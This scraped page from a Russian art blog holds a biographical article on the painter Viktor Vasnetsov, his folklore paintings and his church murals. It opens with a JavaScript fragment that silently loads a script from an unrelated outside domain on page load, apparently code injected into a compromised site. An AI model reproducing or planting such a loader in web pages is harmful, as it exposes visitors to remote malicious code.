, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Васнецов Виктор Михайлович

Автор: Юлия | 05 Май 2011

Имя художника Виктора Михайловича Васнецова (1848-1926) известно многим поклонникам живописи еще со школы. Его картины "Богатыри"(1881-1899), "Аленушка"(1881), "Иван-царевич на сером волке" (1889), "Витязь на распутье" (1878) и многие другие – это невероятно точное воплощение на холсте духа русских сказок, былин, народного фольклора с его самобытной историей.

Виктор Михайлович Васнецов родился в семье православного священника, и этим фактом, во многом, была обусловлена глубокая приверженность художника к религии. Однако живопись влекла его не меньше. И даже не закончив обучение в духовной семинарии, в 1867 году молодой Васнецов отправляется в Санкт-Петербург обучаться рисованию. В рисовальной школе Общества поощрения художеств его учителем был Иван Николаевич Крамской. Затем Васнецов продолжил обучение живописи в Академии художеств (1868-1873).

Первые работы Виктора Михайловича Васнецова были посвящены сценам повседневной жизни: "С квартиры на квартиру" (1876), "Книжная лавочка" (1876), "Военная телеграмма" (1878). Далее художник всерьез увлекается фольклорно-историческим жанром, который, в итоге, и принес ему подлинную славу и признание. Один за другим, в течение почти двадцати лет, Васнецов пишет свои знаменитые шедевры, уже упоминавшиеся в начале статьи. В картинах этого периода удивительным образом соединились правда и вымысел, историческая точность и мифология.

В конце 19 века творческую судьбу Виктора Михайловича Васнецова изменило обращение к монументальному искусству. Оставаясь глубоко верующим человеком, он без раздумий соглашается работать на благо церкви. В 1885-1896 гг. художник занимается росписью Владимирского собора в Киеве. Васнецов вместе с учениками расписал свыше 2000 кв. м внутренних площадей храма. Эта масштабная работа была приурочена к 900-летнему юбилею Крещения Руси. Виктор Михайлович Васнецов принимал участие в росписи еще нескольких церковных сооружений: церкви в Дармштадте, православного собора в Варшаве, храма Воскресения в Петербурге.

В поздний период творчества Васнецов вновь обращается к сказочной теме: "Илья Муромец" (1914), "Поединок Пересвета с Челубеем" (1914), "Царевна-лягушка" (1918), "Кощей Бессмертный" (1926). Однако эти работы получились более мрачными, они как будто полны тревожного ожидания и скрытого предчувствия грядущей революции.

С живописью Виктор Михайлович Васнецов не расставался вплоть до самой смерти. В последние годы он, в основном, занимался созданием портретов. Но в памяти потомков этот великий художник навсегда останется кем-то вроде доброго волшебника, открывшего для зрителей дорогу в мир сказки и щедро наделившего русский фольклор красочными, колоритными живописными образами.

Темы: Изобразительное искусство, Икона, Художник | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress